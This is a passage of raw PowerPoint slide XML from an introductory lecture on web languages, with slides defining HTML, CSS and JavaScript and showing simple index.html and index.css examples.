            <a:pathLst>
              <a:path w="4191000" h="691514">
                <a:moveTo>
                  <a:pt x="0" y="115193"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9052" y="70355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33739" y="33739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70355" y="9052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115194" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4075805" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4119888" y="8768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4157259" y="33739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4182231" y="71111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4190999" y="115193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4190999" y="575957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4181947" y="620796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4157260" y="657412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4120644" y="682099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4075805" y="691151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115194" y="691151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70355" y="682099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33739" y="657412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9052" y="620796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="575957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="115193"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEC623A9-28F7-9E43-996B-46B123DC2755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7160992" y="3338848"/>
            <a:ext cx="1092200" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>webpage</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15276286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315EE9-53C7-2145-8BB7-B0A0A471825D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Webpage Languages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C91300B7-823C-8D4D-8610-116A979CF39A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>HTML: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hypertext Markup Language</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>CSS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cascading Style Sheets</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40703672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BBC48C-C464-4E4A-AE56-6E879938B5F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F33B4451-B188-FA43-9CF3-9963373DBAD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A language to create structured docs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One can embed images, objects, or create interactive forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3760988E-E922-7948-8DD6-CAC72A19D446}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901075" y="3276600"/>
            <a:ext cx="7328525" cy="3207685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A10926C6-8759-1541-841D-8BB8187D4410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="945838" y="3301362"/>
            <a:ext cx="7239000" cy="3182923"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7239000" h="3503929">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7239000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7239000" y="3503612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3503612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D39573-8321-2B41-900E-6D50474A7362}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="945838" y="3301362"/>
            <a:ext cx="7239000" cy="3182923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="282888"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="27940" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="212090">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="220"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>index.html</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="237490">
              <a:lnSpc>
                <a:spcPts val="1664"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5261610" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1090930">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;div&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1517650">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1517650">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" spc="-5" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;Go </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-30" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Google!&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1090930">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1090930">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;form&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1517650">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input type="text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-15" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1517650">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>radio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-15" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1517650">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>checkbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-15" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1090930">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5154930" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="237490">
              <a:lnSpc>
                <a:spcPts val="1664"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39237700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8E7C5-9E46-E349-9487-0ED2B69E6973}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A99306E7-A34C-8A43-A001-251DEC975A2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Style sheet language used for describing the presentation of a doc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DFC0923-C9DC-F544-8CF9-C5A05E151157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869637" y="2794637"/>
            <a:ext cx="5900394" cy="1929763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4678CE5D-F28A-2B4D-98E6-6472CC4A733D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2819400"/>
            <a:ext cx="5810885" cy="2130425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="282888"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="163830">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>index.css</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="168275">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1960"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>p.serif</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="168275">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>font-family: "Times New Roman", Times,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-65" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
